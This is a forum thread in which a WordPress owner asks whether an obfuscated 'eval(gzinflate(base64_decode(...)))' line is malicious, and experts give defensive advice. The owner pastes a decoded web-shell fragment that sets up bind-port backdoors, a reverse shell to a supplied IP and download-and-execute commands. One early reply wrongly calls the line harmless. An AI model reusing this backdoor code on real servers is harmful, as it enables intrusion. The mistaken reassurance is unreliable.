Solved

Is this Malicious code?

Posted on 2011-03-23
10
400 Views
Last Modified: 2012-05-11
Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my wordpress files...
0
Comment
Question by:checkmofoshoduno
  • 2
  • 2
  • 2
  • +3
10 Comments
 

Expert Comment

by:eaglerod
ID: 35204600
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204603
How can i check to see what the code actually is when its decoded?
0
 
LVL 13

Expert Comment

by:Phil Phillips
ID: 35204630
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' Wordpress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval
0
Announcing the Most Valuable Experts of 2016

MVEs are more concerned with the satisfaction of those they help than with the considerable points they can earn. They are the types of people you feel privileged to call colleagues. Join us in honoring this amazing group of Experts.

 

Expert Comment

by:eaglerod
ID: 35204631
I believe this is what you are looking for.

Decoding Information
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35204633
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.
0
 
LVL 4

Expert Comment

by:m_walker
ID: 35204634
@eval(gzinflate(base64_decode($code)));

try
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Note sure where $code gets its value from.
The code could be binary, so expect some weird results.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204644
Yep i managed to also find that link for the decoder and unless that site is messing with me i am seeing the output say "Load and Exploit" and a bunch of other not so good things such as Port Binding

Looks like i will just remove that block of code for now...

Please see attached.
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.
"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Open in new window

0
 
LVL 27

Expert Comment

by:Lukasz Chmielewski
ID: 35204821
The additional question - how did it get there ? Change your access passwords to strong ones and do not store them locally on your computer.
0
 
LVL 13

Accepted Solution

by:
Phil Phillips earned 500 total points
ID: 35204927
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make Wordpress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here's a few blog posts that discuss how to recover from a hacked Wordpress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35208486
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.
0

Featured Post

Announcing the Most Valuable Experts of 2016

MVEs are more concerned with the satisfaction of those they help than with the considerable points they can earn. They are the types of people you feel privileged to call colleagues. Join us in honoring this amazing group of Experts.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Build an array called $myWeek which will hold the array elements Today, Yesterday and then builds up the rest of the week by the name of the day going back 1 week.   (CODE) (CODE) Then you just need to pass your date to the function. If i…
This article discusses how to create an extensible mechanism for linked drop downs.
This video teaches users how to migrate an existing Wordpress website to a new domain.
The purpose of this video is to demonstrate how to reset a WordPress password if you are locked out and cannot reset the password. A typical use would be if you cannot access the email to which WordPress would send the password recovery email to…

808 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question